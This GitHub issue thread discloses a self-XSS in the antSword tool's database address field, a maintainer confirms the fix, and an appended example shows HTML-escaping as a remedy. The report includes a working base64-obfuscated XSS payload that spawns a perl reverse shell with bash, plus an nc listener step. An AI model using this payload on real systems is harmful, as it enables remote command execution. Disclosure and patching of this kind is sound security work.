antSword self-XSS Vulnerability leads to Code Execution #151

Closed
miaochiahao opened this issue Apr 18, 2019 · 1 comment

@miaochiahao
commented Apr 18, 2019

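In addition to the known issues, there is one more input point here that is not filtered; it can cause XSS and execute commands.

Add a shell on the home page, right-click it and choose Data Operations to enter the database management page.

Screenshot 2019-04-18 6.32.40 PM

Enter the payload in the database address field. This input point is not filtered, so the payload executes directly.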

localhost<img src onerror="eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3BlcmwgLWUgXCd1c2UgU29ja2V0OyRpPSIxMjcuMC4w LjEiOyRwPTEwMDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoU yxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKF NUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9iYXNoIC1pIik7fTtcJycsKGVycm9yLCBzdGRvdXQsIHN0ZGVycik9PnsKICAgIGFsZXJ 0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApOwogIH0pOw==`,`base64`).toString())">

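Screenshot 2019-04-18 6.33.28 PM

Start nc listening on port 1002 and you will receive the reverse shell.

Screenshot 2019-04-18 6.35.07 PM

Or, if you just want to pop an alert box, that works too.

Screenshot 2019-04-18 6.35.46 PM

Please fix the self-XSS as well :D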

@Medicean

Collaborator

commented Apr 18, 2019

Thanks for the feedback, this has been fixed.

@miaochiahao miaochiahao changed the title antSword self-XSS Vulnerability leads to RCE antSword self-XSS Vulnerability leads to Code Execution Apr 18, 2019

@Medicean Medicean added this to Done in AntSword-v2.1 Apr 26, 2019
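
An added example, not part of the issue thread or of antSword's own code: one way to close an unfiltered input point like the database address field is to HTML-encode the value where it is written into markup and to validate it before it is saved. The function names, the `conf` shape and the sample value (a harmless `marker()` call standing in for the payload) are assumptions made for illustration.

```javascript
// Added example: all names here are hypothetical, not antSword's API.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;',
  '"': '&quot;', "'": '&#39;', '`': '&#96;',
};

// Encode every character that can open a tag, an attribute or an entity.
function escapeHtml(value) {
  return String(value).replace(/[&<>"'`]/g, (ch) => HTML_ESCAPES[ch]);
}

// Before: the stored address is concatenated into markup, so a tag inside
// it becomes a live element. In a renderer that exposes Node APIs (the
// payload in this issue relies on Buffer), script in that element is no
// longer confined to the page.
function renderLabelUnsafe(conf) {
  return `<span class="db-host">${conf.user}@${conf.host}</span>`;
}

// After: each user-controlled field is encoded at the point of output.
function renderLabelSafe(conf) {
  return `<span class="db-host">${escapeHtml(conf.user)}@${escapeHtml(conf.host)}</span>`;
}

// Defence in depth: accept only a hostname/IPv4 or a bracketed IPv6
// literal, each with an optional port, before the value is stored.
function isPlausibleHost(host) {
  const nameOrV4 = /^[A-Za-z0-9._-]{1,253}(:\d{1,5})?$/;
  const v6 = /^\[[0-9A-Fa-f:.]+\](:\d{1,5})?$/;
  return nameOrV4.test(host) || v6.test(host);
}

// Constructed sample input: same shape as the reported value, inert body.
const sample = { user: 'root', host: 'localhost<img src onerror="marker()">' };

console.log(renderLabelUnsafe(sample)); // contains a live <img> element
console.log(renderLabelSafe(sample));   // the tag is rendered as text
console.log(isPlausibleHost(sample.host), isPlausibleHost('127.0.0.1:3306'));
```

Encoding at output is the actual fix; the host check only narrows what can be stored and does not replace it.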
